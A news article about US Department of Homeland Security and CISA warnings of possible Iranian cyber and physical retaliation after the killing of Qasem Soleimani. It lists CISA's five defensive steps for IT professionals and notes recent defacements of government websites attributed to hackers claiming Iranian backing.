The US Department of Homeland Security has issued a total of three warnings in the last few days encouraging people to be on the alert for physical and cyber attacks from Iran. The announcements follow the US killing of Qasem Soleimani, the commander of Iran’s IRGC-Quds Force. The warnings directly address IT professionals with advice on how to secure their networks against Iranian attack.
On Monday, the Cybersecurity and Infrastructure Security Agency (CISA), which is an agency within the DHS, released the latest publication in its CISA Insights series, which provides background information on cybersecurity threats to the US.
Without explicitly mentioning Soleimani’s killing, it referred to “recent Iran-US tensions” creating a heightened risk of retaliatory acts against the US and its global interests. Organizations should be on the lookout for potential threats, especially if they represent strategic targets such as finance, energy, or telecommunications, it said. Iranian attackers could launch attacks targeting intellectual property or mount disinformation campaigns, it said, while also raising the spectre of physical attacks using improvised explosive devices or unmanned drones.
The publication added:
Review your organisation from an outside perspective and ask the tough questions – are you attractive to Iran and its proxies because of your business model, who your customers and competitors are, or what you stand for?
The same day, CISA also issued an alert specifically targeting IT pros that warned of a potential Iranian cyber response to the military strike. It recommended five actions that IT professionals could take to protect themselves, focusing on a mixture of vulnerability mitigation and incident preparation.
IT pros should:
Disable all unnecessary ports and protocols. Reducing the network attack surface, along with monitoring open ports for command and control activity, will help to reduce network vulnerability and spot potential attackers rattling the doors.
Enhance monitoring of network and email traffic. Restricting attachments and reviewing signatures for malware and phishing themes will help to stop attackers reaching users.
Patch externally facing equipment. Focus on critical vulnerabilities, the Agency warned, especially those that enable remote code execution or denial of service on public-facing equipment.
Log and limit PowerShell use. This powerful Microsoft command line tool is a known asset for online attackers who use it to navigate their way around target systems.
Keep backups updated. This means maintaining air-gapped backup files not reachable by ransomware.
The publication and alert follow a National Terrorism Advisory System (NTAS) bulletin released on 4 January that mentioned the Soleimani strike and noted that Iran’s leaders along with affiliated organisations had vowed revenge against the US.
An attack in the homeland may come with little or no warning.
The US killed Qasem Soleimani using a Reaper drone on 3 January. The strike, which congressional leaders condemned, followed mounting rocket attacks against US bases in Iraq over the past two months.
Experts both in and outside the US government have long identified Iran as a source of malicious cyber activity. Last year, an analysis highlighted an increased focus on industrial control systems from the country’s APT33 hacking group. Almost exactly a year before, the US charged Iranian hackers for their role in an attack using the SamSam ransomware.
Over the weekend, hackers claiming Iranian backing defaced the US government’s Federal Depository Library Program website with a picture of a bloodied president Trump. On Tuesday, intruders altered the Texas Department of Agriculture’s website with a message stating “Hacked by Iranian Hacker”.